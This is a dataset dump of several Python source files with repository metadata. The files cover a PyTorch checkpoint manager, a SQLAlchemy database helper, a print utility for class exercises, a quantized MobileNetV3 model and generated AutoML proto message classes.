70c78495a8a8355cdf25a72248ee053acbe5d09e | 4,051 | py | Python | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | 15 | 2019-08-28T22:06:51.000Z | 2021-10-08T09:52:13.000Z | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | null | null | null | utility_functions/checkpoint_manager.py | MSREnable/GazeCapture | 54f00ab428a7dbb51f8f0c37f22bba6b3cb54726 | [
"RSA-MD"
] | 6 | 2020-11-18T02:46:55.000Z | 2021-07-08T11:12:11.000Z | import math
import os
import shutil
import torch
from collections import OrderedDict
| 41.762887 | 124 | 0.655887 | import math
import os
import shutil
import torch
from collections import OrderedDict
def extract_checkpoint_data(args, model):
    """Restore training state for *model* from a checkpoint, unless args.reset.

    The Train/Info phases resume from 'checkpoint.pth.tar'; any other phase
    loads 'best_checkpoint.pth.tar'.  Weight loading retries with the
    DataParallel 'module.' prefix stripped when the first attempt raises
    RuntimeError.

    Returns (val_rms_errors, test_rms_errors, train_rms_errors,
    best_rms_errors, best_rms_error, epoch, learning_rates); with no usable
    checkpoint the defaults are empty histories, best error = inf, epoch = 1.
    """
    best_rms_error = math.inf
    epoch = 1
    val_rms_errors = []
    test_rms_errors = []
    train_rms_errors = []
    best_rms_errors = []
    learning_rates = []
    if not args.reset:
        # Load last checkpoint if training otherwise load best checkpoint for evaluation
        filename = 'checkpoint.pth.tar' if args.phase == 'Train' or args.phase == 'Info' else 'best_checkpoint.pth.tar'
        saved = load_checkpoint(args.output_path, args.device, filename)
        if saved:
            epoch = saved.get('epoch', epoch)
            # for backward compatibility
            val_rms_errors = saved.get('RMSErrors', saved.get('val_RMSErrors', val_rms_errors))
            test_rms_errors = saved.get('test_RMSErrors', test_rms_errors)
            train_rms_errors = saved.get('train_RMSErrors', train_rms_errors)
            best_rms_error = saved.get('best_RMSError', best_rms_error)
            best_rms_errors = saved.get('best_RMSErrors', best_rms_errors)
            learning_rates = saved.get('learning_rates', learning_rates)
            print(
                'Loading checkpoint : [Epoch: %d | RMSError: %.5f].' % (
                    epoch,
                    best_rms_error)
            )
            # don't load model for the info-only task
            if not args.info:
                # We should start training on the epoch after the last full epoch
                epoch = epoch + 1
                try:
                    state = saved['state_dict']
                    model.load_state_dict(state)
                except RuntimeError:
                    # The most likely cause of a failure to load is that there is a leading "module." from training. This is
                    # normal for models trained with DataParallel. If not using DataParallel, then the "module." needs to be
                    # removed.
                    state = remove_module_from_state(saved)
                    model.load_state_dict(state)
            else:
                # No checkpoint could be read (file missing or unreadable).
                print('Warning: Could not read checkpoint!')
    return val_rms_errors, test_rms_errors, train_rms_errors, best_rms_errors, best_rms_error, epoch, learning_rates
def load_checkpoint(checkpoints_path, device, filename='checkpoint.pth.tar'):
    """Load a checkpoint dict from *checkpoints_path*, or None when absent.

    The checkpoint is mapped onto *device* via torch.load's map_location.
    """
    full_path = os.path.join(checkpoints_path, filename)
    print(full_path)  # keep the original path trace on stdout
    if os.path.isfile(full_path):
        return torch.load(full_path, map_location=device)
    return None
def save_checkpoint(state, is_best, checkpointsPath, saveCheckpoints, filename='checkpoint.pth.tar'):
    """Persist *state* and snapshot auxiliary files.

    Always writes <checkpointsPath>/<filename>.  When saveCheckpoints is
    true, also keeps per-epoch copies of the checkpoint and results plus the
    ITracker source files (copied from the current working directory).  When
    is_best, duplicates the checkpoint/results as best_* files.
    NOTE(review): assumes results.json already exists in checkpointsPath;
    the copyfile calls fail otherwise.
    """
    resultsFilename = os.path.join(checkpointsPath, 'results.json')
    checkpointFilename = os.path.join(checkpointsPath, filename)
    torch.save(state, checkpointFilename)
    if saveCheckpoints:
        # Per-epoch snapshots, named after state['epoch'].
        shutil.copyfile(checkpointFilename,
                        os.path.join(checkpointsPath, 'checkpoint' + str(state['epoch']) + '.pth.tar'))
        shutil.copyfile(resultsFilename, os.path.join(checkpointsPath, 'results' + str(state['epoch']) + '.json'))
        shutil.copyfile('ITrackerModel.py', os.path.join(checkpointsPath, 'ITrackerModel.py'))
        shutil.copyfile('ITrackerData.py', os.path.join(checkpointsPath, 'ITrackerData.py'))
    bestFilename = os.path.join(checkpointsPath, 'best_' + filename)
    bestResultsFilename = os.path.join(checkpointsPath, 'best_results.json')
    if is_best:
        shutil.copyfile(checkpointFilename, bestFilename)
        shutil.copyfile(resultsFilename, bestResultsFilename)
def remove_module_from_state(saved_state):
    """Return a CPU copy of saved_state['state_dict'] without the
    DataParallel 'module.' prefix.

    CUDA training with DataParallel prepends 'module.' to every state_dict
    key; this strips the first 7 characters of each key and moves each
    tensor to the CPU so CPU-only runs can load the weights.
    """
    cpu_state = OrderedDict(
        (name[7:], tensor.to(device='cpu'))
        for name, tensor in saved_state['state_dict'].items()
    )
    return cpu_state
27a22c03eb1f5ac3a0f550ccf77ba60c76ff7601 | 1,418 | py | Python | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | subreddit_simulator/database.py | dimitern/SubredditSimulator | b0a43746c688507547646019717ce9e630520f90 | [
"MIT"
] | null | null | null | import json
from logging import getLogger
import attr
from sqlalchemy import Text, TypeDecorator, create_engine
from sqlalchemy.orm import sessionmaker
logger = getLogger(__name__)
@attr.s(auto_attribs=True)
| 24.033898 | 73 | 0.614951 | import json
from logging import getLogger
import attr
from sqlalchemy import Text, TypeDecorator, create_engine
from sqlalchemy.orm import sessionmaker
logger = getLogger(__name__)
class JSONSerialized(TypeDecorator):
    """SQLAlchemy column type storing JSON-serializable values as Text.

    Values are dumped to a JSON string on the way into the database and
    parsed back into Python objects on the way out.
    """
    # Underlying column type SQLAlchemy uses for storage.
    impl = Text
    def process_bind_param(self, value, dialect):
        """Serialize *value* to a JSON string before writing."""
        return json.dumps(value)
    def process_result_value(self, value, dialect):
        """Parse the stored JSON string back into a Python value."""
        return json.loads(value)
@attr.s(auto_attribs=True)
class Engine:
    """Database connection settings plus helpers to build SQLAlchemy objects."""
    # Connection parameters; defaults target sqlite.
    system: str = "sqlite"
    database: str = ""
    host: str = ""
    port: int = 0
    username: str = ""
    password: str = ""
    @property
    def url(self) -> str:
        """Assemble the SQLAlchemy connection URL for these settings."""
        prefix = f"{self.system}://"
        auth = f"{self.username}:{self.password}@{self.host}:{self.port}"
        suffix = f"/{self.database}"
        # sqlite URLs take no credentials/host section.
        if self.system == "sqlite":
            return prefix + suffix
        return prefix + auth + suffix
    @classmethod
    def from_config(cls, config) -> "Engine":
        """Build an Engine from any object exposing same-named attributes."""
        return cls(  # type: ignore
            system=config.system,
            username=config.username,
            password=config.password,
            host=config.host,
            port=config.port,
            database=config.database,
        )
    def create(self):
        """Create the SQLAlchemy engine for self.url."""
        return create_engine(self.url)
    def create_session(self, engine=None):
        """Return a new ORM session bound to *engine* (created on demand)."""
        engine = engine or self.create()
        Session = sessionmaker(bind=engine)
        return Session()
| 811 | 349 | 45 |
bec5a5fbc0c17c5944c8cd04be49c871c91a55a9 | 651 | py | Python | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | 2 | 2019-09-04T03:29:12.000Z | 2021-03-02T07:22:08.000Z | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | null | null | null | class_setup.py | ilankham/wuss-2019-half-day-class | 7b872e5ee294e62c62a20c5cd7b4e441df63f70a | [
"MIT"
] | 3 | 2019-09-04T05:57:02.000Z | 2019-09-15T21:21:47.000Z | # This modules contains definitions used in Exercise Files
from typing import Any
def print_with_title(
    output: Any,
    title: str = '',
    linebreaks_before: int = 2,
    linebreaks_after: int = 2,
    put_stars_after: bool = True,
) -> None:
    """Print *output* under *title*, padded with blank lines, and optionally
    followed by a row of 80 asterisks.
    """
    padding_top = '\n' * linebreaks_before
    padding_bottom = '\n' * linebreaks_after
    # Title and output are always separated by exactly one blank line.
    print(f'{padding_top}{title}\n\n{output}{padding_bottom}')
    if put_stars_after:
        print('*' * 80)
if __name__ == '__main__':
print_with_title('This module is working as expected!')
| 23.25 | 76 | 0.589862 | # This modules contains definitions used in Exercise Files
from typing import Any
def print_with_title(
    output: Any,
    title: str = '',
    linebreaks_before: int = 2,
    linebreaks_after: int = 2,
    put_stars_after: bool = True,
) -> None:
    """Print *output* under *title*, padded with blank lines, and optionally
    followed by a row of 80 asterisks.
    """
    padding_top = '\n' * linebreaks_before
    padding_bottom = '\n' * linebreaks_after
    # Title and output are always separated by exactly one blank line.
    print(f'{padding_top}{title}\n\n{output}{padding_bottom}')
    if put_stars_after:
        print('*' * 80)
if __name__ == '__main__':
print_with_title('This module is working as expected!')
| 0 | 0 | 0 |
0778ebef3af258a1d259010e5612ff39de977bce | 9,513 | py | Python | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | vision/nn/mobilenetv3.py | wooramkang/competition___ | 5f2e409032f2eddc9d0a8237058129ca2d199b68 | [
"MIT"
] | null | null | null | '''MobileNetV3 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import os
import sys
sys.path.append(".")
from meta_utils.meta_quantized_module import MetaQuantConv, MetaQuantLinear
def conv3x3(in_planes, out_planes, kernel_size=3, stride=0, padding=1, bias=False, bitW=1):
    """Build a MetaQuantConv layer; defaults describe a padded 3x3 convolution.

    NOTE(review): the default ``stride=0`` is not a valid convolution stride;
    every call site in this file passes ``stride`` explicitly — confirm before
    relying on the default.
    """
    return MetaQuantConv(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias, bitW=bitW)
'''
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size // reduction),
nn.ReLU(inplace=True),
nn.Conv2d(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size),
hsigmoid()
'''
class Block(nn.Module):
'''expand + depthwise + pointwise'''
from ptflops import get_model_complexity_info
test()
| 36.588462 | 130 | 0.589089 | '''MobileNetV3 in PyTorch.
See the paper "Inverted Residuals and Linear Bottlenecks:
Mobile Networks for Classification, Detection and Segmentation" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import os
import sys
sys.path.append(".")
from meta_utils.meta_quantized_module import MetaQuantConv, MetaQuantLinear
def conv3x3(in_planes, out_planes, kernel_size=3, stride=0, padding=1, bias=False, bitW=1):
    """Build a MetaQuantConv layer; defaults describe a padded 3x3 convolution.

    NOTE(review): the default ``stride=0`` is not a valid convolution stride;
    every call site in this file passes ``stride`` explicitly — confirm before
    relying on the default.
    """
    return MetaQuantConv(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=bias, bitW=bitW)
class hswish(nn.Module):
    """Hard-swish activation: ``x * relu6(x + 3) / 6`` (MobileNetV3 paper)."""
    def forward(self, x):
        # relu6 runs in-place on the (x + 3) temporary, never on x itself.
        shifted = F.relu6(x + 3, inplace=True)
        return x * shifted / 6
class hsigmoid(nn.Module):
    """Hard-sigmoid activation: ``relu6(x + 3) / 6`` — a piecewise-linear sigmoid."""
    def forward(self, x):
        # relu6 runs in-place on the (x + 3) temporary, never on x itself.
        clipped = F.relu6(x + 3, inplace=True)
        return clipped / 6
'''
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size // reduction),
nn.ReLU(inplace=True),
nn.Conv2d(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(in_size),
hsigmoid()
'''
class SeModule(nn.Module):
    """Squeeze-and-Excitation block: global pool -> bottleneck (1/reduction)
    -> hard-sigmoid gate, multiplied back onto the input feature map.
    """
    def __init__(self, in_size, reduction=4):
        super(SeModule, self).__init__()
        # conv3x3 with kernel_size=1 here yields quantized 1x1 convolutions.
        self.se = nn.Sequential(
            nn.AdaptiveAvgPool2d(1),
            conv3x3(in_size, in_size // reduction, kernel_size=1, stride=1, padding=0),
            nn.BatchNorm2d(in_size // reduction),
            nn.ReLU(inplace=True),
            conv3x3(in_size // reduction, in_size, kernel_size=1, stride=1, padding=0),
            nn.BatchNorm2d(in_size),
            hsigmoid()
        )
    def forward(self, x):
        # Channel-wise reweighting of x by the learned gate.
        return x * self.se(x)
class Block(nn.Module):
    '''expand + depthwise + pointwise'''
    def __init__(self, kernel_size, in_size, expand_size, out_size, nolinear, semodule, stride):
        # nolinear is a single activation module shared by both stages
        # (safe here because the activations used are stateless).
        super(Block, self).__init__()
        self.stride = stride
        self.se = semodule
        self.conv1 = conv3x3(in_size, expand_size, kernel_size=1, stride=1, padding=0, bias=False)
        self.bn1 = nn.BatchNorm2d(expand_size)
        self.nolinear1 = nolinear
        # NOTE(review): conv2 is built without groups=expand_size, so despite
        # the docstring it is a full convolution, not depthwise — confirm
        # whether that is intentional for the quantized variant.
        self.conv2 = conv3x3(expand_size, expand_size, kernel_size=kernel_size, stride=stride, padding=kernel_size//2, bias=False)
        self.bn2 = nn.BatchNorm2d(expand_size)
        self.nolinear2 = nolinear
        self.conv3 = conv3x3(expand_size, out_size, kernel_size=1, stride=1, padding=0, bias=False)
        self.bn3 = nn.BatchNorm2d(out_size)
        # Identity shortcut unless channel counts differ at stride 1, in
        # which case a 1x1 projection matches dimensions.
        self.shortcut = nn.Sequential()
        if stride == 1 and in_size != out_size:
            self.shortcut = nn.Sequential(
                conv3x3(in_size, out_size, kernel_size=1, stride=1, padding=0, bias=False),
                nn.BatchNorm2d(out_size),
            )
    def forward(self, x):
        out = self.nolinear1(self.bn1(self.conv1(x)))
        out = self.nolinear2(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        if self.se != None:
            out = self.se(out)
        # Residual connection only applies at stride 1.
        out = out + self.shortcut(x) if self.stride==1 else out
        return out
class MobileNetV3_Large(nn.Module):
    """MobileNetV3-Large classifier built from quantized conv/linear layers.

    The bneck configuration literals follow the MobileNetV3 paper's Large
    table (kernel, in, expand, out, activation, SE, stride).
    """
    def __init__(self, num_classes=1000):
        super(MobileNetV3_Large, self).__init__()
        # self.features collects every module in order, then is frozen into
        # an nn.Sequential at the end of __init__.
        self.features = []
        self.conv1 = conv3x3(3, 16, kernel_size=3, stride=2, padding=1, bias=False)
        self.features.append(self.conv1)
        self.bn1 = nn.BatchNorm2d(16)
        self.features.append(self.bn1)
        self.hs1 = hswish()
        self.features.append(self.hs1)
        self.bneck = nn.Sequential(
            Block(3, 16, 16, 16, nn.ReLU(inplace=True), None, 1),
            Block(3, 16, 64, 24, nn.ReLU(inplace=True), None, 2),
            Block(3, 24, 72, 24, nn.ReLU(inplace=True), None, 1),
            Block(5, 24, 72, 40, nn.ReLU(inplace=True), SeModule(40), 2),
            Block(5, 40, 120, 40, nn.ReLU(inplace=True), SeModule(40), 1),
            Block(5, 40, 120, 40, nn.ReLU(inplace=True), SeModule(40), 1),
            Block(3, 40, 240, 80, hswish(), None, 2),
            Block(3, 80, 200, 80, hswish(), None, 1),
            Block(3, 80, 184, 80, hswish(), None, 1),
            Block(3, 80, 184, 80, hswish(), None, 1),
            Block(3, 80, 480, 112, hswish(), SeModule(112), 1),
            Block(3, 112, 672, 112, hswish(), SeModule(112), 1),
            Block(5, 112, 672, 160, hswish(), SeModule(160), 1),
            Block(5, 160, 672, 160, hswish(), SeModule(160), 2),
            Block(5, 160, 960, 160, hswish(), SeModule(160), 1),
        )
        self.features.extend([block for block in self.bneck])
        self.conv2 = conv3x3(160, 960, kernel_size=1, stride=1, padding=0, bias=False)
        self.features.append(self.conv2)
        self.bn2 = nn.BatchNorm2d(960)
        self.features.append(self.bn2)
        self.hs2 = hswish()
        self.features.append(self.hs2)
        self.linear3 = MetaQuantLinear(960, 1280)
        self.bn3 = nn.BatchNorm1d(1280)
        self.hs3 = hswish()
        self.linear4 = MetaQuantLinear(1280, num_classes)
        self.init_params()
        self.features = nn.Sequential(*self.features)
    def init_params(self):
        """Kaiming init for quantized convs, constant init for batch norms,
        small-normal init for quantized linears."""
        for m in self.modules():
            if isinstance(m, MetaQuantConv):
                init.kaiming_normal_(m.weight, mode='fan_out')
                if m.bias is not None:
                    init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                init.constant_(m.weight, 1)
                init.constant_(m.bias, 0)
            elif isinstance(m, MetaQuantLinear):
                init.normal_(m.weight, std=0.001)
                if m.bias is not None:
                    init.constant_(m.bias, 0)
    def forward(self, x):
        out = self.hs1(self.bn1(self.conv1(x)))
        out = self.bneck(out)
        out = self.hs2(self.bn2(self.conv2(out)))
        # Fixed 7x7 pooling assumes 224x224 input resolution.
        out = F.avg_pool2d(out, 7)
        out = out.view(out.size(0), -1)
        out = self.hs3(self.bn3(self.linear3(out)))
        out = self.linear4(out)
        return out
class MobileNetV3_Small(nn.Module):
    """MobileNetV3-Small classifier built from quantized conv/linear layers.

    The bneck configuration literals follow the MobileNetV3 paper's Small
    table (kernel, in, expand, out, activation, SE, stride).
    """
    def __init__(self, num_classes=1000):
        super(MobileNetV3_Small, self).__init__()
        # self.features collects every module in order, then is frozen into
        # an nn.Sequential at the end of __init__.
        self.features = []
        self.conv1 = conv3x3(3, 16, kernel_size=3, stride=2, padding=1, bias=False)
        self.features.append(self.conv1)
        self.bn1 = nn.BatchNorm2d(16)
        self.features.append(self.bn1)
        self.hs1 = hswish()
        self.features.append(self.hs1)
        self.bneck = nn.Sequential(
            Block(3, 16, 16, 16, nn.ReLU(inplace=True), SeModule(16), 2),
            Block(3, 16, 72, 24, nn.ReLU(inplace=True), None, 2),
            Block(3, 24, 88, 24, nn.ReLU(inplace=True), None, 1),
            Block(5, 24, 96, 40, hswish(), SeModule(40), 2),
            Block(5, 40, 240, 40, hswish(), SeModule(40), 1),
            Block(5, 40, 240, 40, hswish(), SeModule(40), 1),
            Block(5, 40, 120, 48, hswish(), SeModule(48), 1),
            Block(5, 48, 144, 48, hswish(), SeModule(48), 1),
            Block(5, 48, 288, 96, hswish(), SeModule(96), 2),
            Block(5, 96, 576, 96, hswish(), SeModule(96), 1),
            Block(5, 96, 576, 96, hswish(), SeModule(96), 1),
        )
        self.features.extend([block for block in self.bneck])
        self.conv2 = conv3x3(96, 576, kernel_size=1, stride=1, padding=0, bias=False)
        self.features.append(self.conv2)
        self.bn2 = nn.BatchNorm2d(576)
        self.features.append(self.bn2)
        self.hs2 = hswish()
        self.features.append(self.hs2)
        self.linear3 = MetaQuantLinear(576, 1280) #nn.Linear(576, 1280)
        self.bn3 = nn.BatchNorm1d(1280)
        self.hs3 = hswish()
        self.linear4 = MetaQuantLinear(1280, num_classes)
        self.init_params()
        self.features = nn.Sequential(*self.features)
    def init_params(self):
        """Kaiming init for quantized convs, constant init for batch norms,
        small-normal init for quantized linears."""
        for m in self.modules():
            if isinstance(m, MetaQuantConv):
                init.kaiming_normal_(m.weight, mode='fan_out')
                if m.bias is not None:
                    init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                init.constant_(m.weight, 1)
                init.constant_(m.bias, 0)
            elif isinstance(m, MetaQuantLinear):
                init.normal_(m.weight, std=0.001)
                if m.bias is not None:
                    init.constant_(m.bias, 0)
    def forward(self, x):
        out = self.hs1(self.bn1(self.conv1(x)))
        out = self.bneck(out)
        out = self.hs2(self.bn2(self.conv2(out)))
        # Fixed 7x7 pooling assumes 224x224 input resolution.
        out = F.avg_pool2d(out, 7)
        out = out.view(out.size(0), -1)
        out = self.hs3(self.bn3(self.linear3(out)))
        out = self.linear4(out)
        return out
def get_n_params(model):
    """Return the total number of scalar parameters in *model*."""
    # numel() equals the product of each parameter's dimensions
    # (and 1 for zero-dimensional parameters), matching a manual product.
    return sum(p.numel() for p in model.parameters())
from ptflops import get_model_complexity_info
def test():
    """Smoke-test: forward pass on random input, then report parameter count
    and ptflops complexity for MobileNetV3_Large."""
    #net = MobileNetV3_Small()
    net = MobileNetV3_Large()
    x = torch.randn(2,3,224,224)
    y = net(x)
    print(y.size())
    print(get_n_params(net))
    # ptflops returns human-readable MAC/parameter strings when as_strings=True.
    macs, params = get_model_complexity_info(net, (3, 224, 224), as_strings=True,
                                           print_per_layer_stat=True, verbose=True)
    print('{:<30} {:<8}'.format('Computational complexity: ', macs))
    print('{:<30} {:<8}'.format('Number of parameters: ', params))
test()
| 7,913 | 41 | 478 |
0ee0394192b51c955a40df3785735b6429d88380 | 5,445 | py | Python | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform/v1beta1/schema/trainingjob/definition_v1beta1/types/automl_image_classification.py | ivanmkc/python-aiplatform | 151ed11f6da8e3e0bee5749d360d9a4b135ad988 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1beta1.schema.trainingjob.definition",
manifest={
"AutoMlImageClassification",
"AutoMlImageClassificationInputs",
"AutoMlImageClassificationMetadata",
},
)
class AutoMlImageClassification(proto.Message):
    r"""A TrainingJob that trains and uploads an AutoML Image
    Classification Model.
    Attributes:
        inputs (~.automl_image_classification.AutoMlImageClassificationInputs):
            The input parameters of this TrainingJob.
        metadata (~.automl_image_classification.AutoMlImageClassificationMetadata):
            The metadata information.
    """
    # NOTE: generated proto-plus wrapper; field numbers must stay in sync
    # with the service protobuf definition — do not renumber by hand.
    inputs = proto.Field(
        proto.MESSAGE, number=1, message="AutoMlImageClassificationInputs",
    )
    metadata = proto.Field(
        proto.MESSAGE, number=2, message="AutoMlImageClassificationMetadata",
    )
class AutoMlImageClassificationInputs(proto.Message):
r"""
Attributes:
model_type (~.automl_image_classification.AutoMlImageClassificationInputs.ModelType):
base_model_id (str):
The ID of the ``base`` model. If it is specified, the new
model will be trained based on the ``base`` model.
Otherwise, the new model will be trained from scratch. The
``base`` model must be in the same Project and Location as
the new Model to train, and have the same modelType.
budget_milli_node_hours (int):
The training budget of creating this model, expressed in
milli node hours i.e. 1,000 value in this field means 1 node
hour. The actual metadata.costMilliNodeHours will be equal
or less than this value. If further model training ceases to
provide any improvements, it will stop without using the
full budget and the metadata.successfulStopReason will be
``model-converged``. Note, node_hour = actual_hour \*
number_of_nodes_involved. For modelType
``cloud``\ (default), the budget must be between 8,000 and
800,000 milli node hours, inclusive. The default value is
192,000 which represents one day in wall time, considering 8
nodes are used. For model types ``mobile-tf-low-latency-1``,
``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1``,
the training budget must be between 1,000 and 100,000 milli
node hours, inclusive. The default value is 24,000 which
represents one day in wall time on a single node that is
used.
disable_early_stopping (bool):
Use the entire training budget. This disables
the early stopping feature. When false the early
stopping feature is enabled, which means that
AutoML Image Classification might stop training
before the entire training budget has been used.
multi_label (bool):
If false, a single-label (multi-class) Model
will be trained (i.e. assuming that for each
image just up to one annotation may be
applicable). If true, a multi-label Model will
be trained (i.e. assuming that for each image
multiple annotations may be applicable).
"""
class ModelType(proto.Enum):
r""""""
MODEL_TYPE_UNSPECIFIED = 0
CLOUD = 1
MOBILE_TF_LOW_LATENCY_1 = 2
MOBILE_TF_VERSATILE_1 = 3
MOBILE_TF_HIGH_ACCURACY_1 = 4
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
base_model_id = proto.Field(proto.STRING, number=2)
budget_milli_node_hours = proto.Field(proto.INT64, number=3)
disable_early_stopping = proto.Field(proto.BOOL, number=4)
multi_label = proto.Field(proto.BOOL, number=5)
class AutoMlImageClassificationMetadata(proto.Message):
    r"""
    Attributes:
        cost_milli_node_hours (int):
            The actual training cost of creating this
            model, expressed in milli node hours, i.e. 1,000
            value in this field means 1 node hour.
            Guaranteed to not exceed
            inputs.budgetMilliNodeHours.
        successful_stop_reason (~.automl_image_classification.AutoMlImageClassificationMetadata.SuccessfulStopReason):
            For successful job completions, this is the
            reason why the job has finished.
    """
    # NOTE: generated proto-plus wrapper; field numbers must stay in sync
    # with the service protobuf definition — do not renumber by hand.
    class SuccessfulStopReason(proto.Enum):
        r""""""
        SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
        BUDGET_REACHED = 1
        MODEL_CONVERGED = 2
    cost_milli_node_hours = proto.Field(proto.INT64, number=1)
    successful_stop_reason = proto.Field(
        proto.ENUM, number=2, enum=SuccessfulStopReason,
    )
__all__ = tuple(sorted(__protobuf__.manifest))
| 37.8125 | 118 | 0.673462 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1beta1.schema.trainingjob.definition",
manifest={
"AutoMlImageClassification",
"AutoMlImageClassificationInputs",
"AutoMlImageClassificationMetadata",
},
)
class AutoMlImageClassification(proto.Message):
r"""A TrainingJob that trains and uploads an AutoML Image
Classification Model.
Attributes:
inputs (~.automl_image_classification.AutoMlImageClassificationInputs):
The input parameters of this TrainingJob.
metadata (~.automl_image_classification.AutoMlImageClassificationMetadata):
The metadata information.
"""
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageClassificationInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageClassificationMetadata",
)
class AutoMlImageClassificationInputs(proto.Message):
r"""
Attributes:
model_type (~.automl_image_classification.AutoMlImageClassificationInputs.ModelType):
base_model_id (str):
The ID of the ``base`` model. If it is specified, the new
model will be trained based on the ``base`` model.
Otherwise, the new model will be trained from scratch. The
``base`` model must be in the same Project and Location as
the new Model to train, and have the same modelType.
budget_milli_node_hours (int):
The training budget of creating this model, expressed in
milli node hours i.e. 1,000 value in this field means 1 node
hour. The actual metadata.costMilliNodeHours will be equal
or less than this value. If further model training ceases to
provide any improvements, it will stop without using the
full budget and the metadata.successfulStopReason will be
``model-converged``. Note, node_hour = actual_hour \*
number_of_nodes_involved. For modelType
``cloud``\ (default), the budget must be between 8,000 and
800,000 milli node hours, inclusive. The default value is
192,000 which represents one day in wall time, considering 8
nodes are used. For model types ``mobile-tf-low-latency-1``,
``mobile-tf-versatile-1``, ``mobile-tf-high-accuracy-1``,
the training budget must be between 1,000 and 100,000 milli
node hours, inclusive. The default value is 24,000 which
represents one day in wall time on a single node that is
used.
disable_early_stopping (bool):
Use the entire training budget. This disables
the early stopping feature. When false the early
stopping feature is enabled, which means that
AutoML Image Classification might stop training
before the entire training budget has been used.
multi_label (bool):
If false, a single-label (multi-class) Model
will be trained (i.e. assuming that for each
image just up to one annotation may be
applicable). If true, a multi-label Model will
be trained (i.e. assuming that for each image
multiple annotations may be applicable).
"""
class ModelType(proto.Enum):
r""""""
MODEL_TYPE_UNSPECIFIED = 0
CLOUD = 1
MOBILE_TF_LOW_LATENCY_1 = 2
MOBILE_TF_VERSATILE_1 = 3
MOBILE_TF_HIGH_ACCURACY_1 = 4
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
base_model_id = proto.Field(proto.STRING, number=2)
budget_milli_node_hours = proto.Field(proto.INT64, number=3)
disable_early_stopping = proto.Field(proto.BOOL, number=4)
multi_label = proto.Field(proto.BOOL, number=5)
class AutoMlImageClassificationMetadata(proto.Message):
r"""
Attributes:
cost_milli_node_hours (int):
The actual training cost of creating this
model, expressed in milli node hours, i.e. 1,000
value in this field means 1 node hour.
Guaranteed to not exceed
inputs.budgetMilliNodeHours.
successful_stop_reason (~.automl_image_classification.AutoMlImageClassificationMetadata.SuccessfulStopReason):
For successful job completions, this is the
reason why the job has finished.
"""
class SuccessfulStopReason(proto.Enum):
r""""""
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 0 | 0 | 0 |
